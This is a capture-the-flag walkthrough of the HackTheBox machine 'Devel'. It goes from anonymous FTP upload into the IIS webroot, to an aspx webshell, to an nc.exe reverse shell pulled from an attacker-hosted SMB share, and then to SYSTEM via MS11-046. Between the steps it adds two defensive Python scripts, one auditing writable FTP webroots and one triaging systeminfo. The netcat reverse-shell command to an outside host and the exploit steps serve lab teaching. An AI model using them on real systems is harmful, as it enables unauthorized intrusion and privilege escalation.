Devel
An easy Windows box from HackTheBox, using an unsecured FTP server and file upload to get initial access, then a version CVE for SYSTEM.
Recon
Regular nmap
nmap -sC -sV -oA nmap/devel 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.016s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Try to anonymously log in to FTP, and find a few files
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
We can also upload files, and they show up on the web server
touch test.html && echo test > test.html
Browsing to http://10.10.10.5/test.html serves the file we just uploaded, so the FTP root is also the IIS webroot
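The manual test above (upload a file over anonymous FTP, then see whether IIS serves it) is the kind of check worth scripting when auditing a fleet for this misconfiguration. The script below is an added example, not part of the writeup: it logs in anonymously, parses the MS-DOS style listing Microsoft ftpd returns, uploads a random marker, checks whether HTTP returns it, and deletes the marker again. The FTP and HTTP clients are injectable so the logic can be exercised against in-memory stand-ins; HOST, the marker file name and the anonymous password are assumptions.

```python
"""Audit check: is anonymous FTP writable, and is its root the IIS webroot?

Added example for this writeup (not the author's code). Uses only the standard library."""
import ftplib
import io
import secrets
import urllib.error
import urllib.request

HOST = "10.10.10.5"   # the box from the writeup; substitute your own target when auditing


def parse_dos_listing(lines):
    """Parse Microsoft ftpd's MS-DOS style LIST lines, e.g.
    '03-18-17 02:06AM <DIR> aspnet_client' or '03-17-17 05:37PM 689 iisstart.htm'.
    Returns (name, is_dir, size) tuples; lines that do not fit the format are skipped."""
    entries = []
    for line in lines:
        parts = line.split(maxsplit=3)          # maxsplit keeps names containing spaces intact
        if len(parts) != 4:
            continue
        _date, _time, size_or_dir, name = parts
        if size_or_dir == "<DIR>":
            entries.append((name, True, None))
        elif size_or_dir.isdigit():
            entries.append((name, False, int(size_or_dir)))
    return entries


def http_get(url, timeout=5):
    """Fetch url and return the body, or None on a non-2xx response or connection error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (urllib.error.URLError, OSError):
        return None


def check_anonymous_ftp_webroot(host, ftp=None, fetch=http_get):
    """Return a dict: can we log in anonymously, can we upload, and does HTTP serve the upload?

    `ftp` defaults to a real ftplib.FTP connection to `host`; a test can pass any object with
    login/retrlines/storbinary/delete/close methods instead. `fetch(url)` must return bytes or None."""
    result = {"anonymous_login": False, "upload": False, "served_by_http": False, "files": []}
    ftp = ftp or ftplib.FTP(host, timeout=5)
    try:
        try:
            ftp.login("anonymous", "anonymous@example.com")   # constructed anonymous password
        except ftplib.error_perm:
            return result                                      # anonymous access refused
        result["anonymous_login"] = True

        listing = []
        ftp.retrlines("LIST", listing.append)
        result["files"] = [name for name, is_dir, _ in parse_dos_listing(listing) if not is_dir]

        marker = f"audit-{secrets.token_hex(4)}.txt"           # random name: never clobber a real file
        token = secrets.token_hex(8).encode()                  # random body: proves the fetch hit our upload
        try:
            ftp.storbinary(f"STOR {marker}", io.BytesIO(token))
        except ftplib.error_perm:
            return result                                      # read-only anonymous share
        result["upload"] = True

        body = fetch(f"http://{host}/{marker}")
        result["served_by_http"] = body is not None and token in body

        try:
            ftp.delete(marker)                                 # leave the share as we found it
        except ftplib.error_perm:
            pass
        return result
    finally:
        ftp.close()


if __name__ == "__main__":
    print(check_anonymous_ftp_webroot(HOST))
```

A result with all three flags true is the Devel condition: anyone on the network can place content in the webroot, and on an ASP.NET host that content executes. The fix is to separate the FTP root from the site root (or disable anonymous write), which this check will confirm by reporting `served_by_http` as false.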
Exploitation
The server is running IIS 7.5, which executes ASP.NET (.aspx) pages, so we can start with an aspx webshell and then move to a reverse shell
Find the aspx reverse shell
locate cmd.aspx
/usr/share/davtest/backdoors/aspx_cmd.aspx
Then copy it into the current directory and upload it to the FTP server to get a webshell
Now we need to get nc.exe onto the server; serving it from an SMB share is a very cool trick
First, make an smb directory that will be the root of the share
mkdir smb
Then copy nc.exe into smb
cp {path to nc.exe} smb
And run Impacket's smbserver.py
python3 /home/kali/.local/bin/smbserver.py share smb
The “share” part is just the name of the share; back in the web shell you can then execute nc.exe from that share for a reverse shell like so
\\10.10.14.8\share\nc.exe -e cmd.exe 10.10.14.8 8000
And get shell
Now run systeminfo and copy the output into a text file to feed Windows Exploit Suggester
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 25/5/2022, 11:30:06
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.472 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.548 MB
Virtual Memory: In Use: 593 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::4428:f438:fd2a:79a1
[04]: dead:beef::58c0:f1cf:abc6:bb9e
Running Windows Exploit Suggester against that output shows the box is vulnerable to MS11-046, and, importantly, that exploit is reverse-shell friendly
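Windows Exploit Suggester starts from exactly the two things in that systeminfo dump: the OS version/build line and the list of installed hotfixes. The script below is an added example, not part of the writeup or of the Suggester itself: it parses a systeminfo dump into fields (handling the two-level "Virtual Memory: Max Size:" keys and the indented "[01]:" continuation lines) and reports the findings a reviewer would note before touching an exploit database. SYSTEMINFO is the box's own output as printed above, shortened and with the mis-encoded Greek AM/PM markers dropped; SYSTEMINFO_PATCHED is a constructed sample with placeholder KB numbers that exercises the hotfix-list path.

```python
"""Triage a raw `systeminfo` dump: OS build, installed hotfixes, and what stands out.

Added example for this writeup; not the author's code and not Windows Exploit Suggester."""
import re

# The box's own systeminfo output (shortened; Greek AM/PM markers removed).
SYSTEMINFO = """\
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Configuration: Standalone Workstation
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: In Use: 593 MB
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
IP address(es)
[01]: 10.10.10.5
"""

# Constructed sample of a patched host; KB numbers are placeholders, not real bulletins.
SYSTEMINFO_PATCHED = """\
Host Name: EXAMPLE-PC
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7601 Service Pack 1 Build 7601
System Type: x64-based PC
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB1111111
[02]: KB2222222
"""

SUBKEY = re.compile(r"^([A-Za-z ]+):\s+(.*)$")   # 'Max Size: 6.141 MB' nested inside a value
ITEM = re.compile(r"^\[\d+\]:\s*(.+)$")          # '[01]: KB1111111' continuation lines
WIN_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_systeminfo(text):
    """Map 'Key: value' lines to a dict; '[NN]: item' lines are collected under '<Key>_list'."""
    fields, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        item = ITEM.match(line)
        if item and current:
            fields.setdefault(current + "_list", []).append(item.group(1).strip())
            continue
        key, sep, value = line.partition(":")
        if not sep:                              # 'IP address(es)' heads a list with no value
            key, value = line, ""
        key, value = key.strip(), value.strip()
        sub = SUBKEY.match(value)                # 'Virtual Memory: Max Size: ...' -> two-level key
        if sub:
            key, value = f"{key}: {sub.group(1)}", sub.group(2)
        fields[key] = value
        current = key
    return fields


def os_build(fields):
    """(major, minor, build) from 'OS Version', e.g. (6, 1, 7600) for Windows 7 RTM."""
    m = WIN_VERSION.match(fields.get("OS Version", ""))
    return tuple(int(x) for x in m.groups()) if m else None


def installed_hotfixes(fields):
    """KB identifiers under Hotfix(s); empty when systeminfo reports N/A."""
    if fields.get("Hotfix(s)", "N/A").upper().startswith("N/A"):
        return []
    return [h for h in fields.get("Hotfix(s)_list", []) if h.upper().startswith("KB")]


def triage(fields):
    """Plain-English findings to record before consulting an exploit/bulletin database."""
    findings = []
    build = os_build(fields)
    if not installed_hotfixes(fields):
        findings.append("no hotfixes installed: the host has had no security updates since install")
    if build and build[:2] == (6, 1) and build[2] < 7601:
        findings.append(f"Windows 7 build {build[2]} predates SP1 (build 7601)")
    if fields.get("System Type", "").lower().startswith("x86"):
        findings.append("32-bit installation: 64-bit-only patches and binaries do not apply")
    return findings


if __name__ == "__main__":
    for name, dump in (("DEVEL", SYSTEMINFO), ("patched sample", SYSTEMINFO_PATCHED)):
        print(name, triage(parse_systeminfo(dump)) or ["nothing notable"])
```

On Devel the output is the whole story: build 7600 with no hotfixes means every kernel bulletin issued after the Windows 7 release, MS11-046 among them, is still open, which is why the Suggester's list is long and why a host in that state should never be reachable from an anonymous-writable webroot.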
Copy MS11-046.exe to the smb share and execute it from there, getting SYSTEM
c:\Users>\\10.10.14.8\share\MS11-046.exe
\\10.10.14.8\share\MS11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system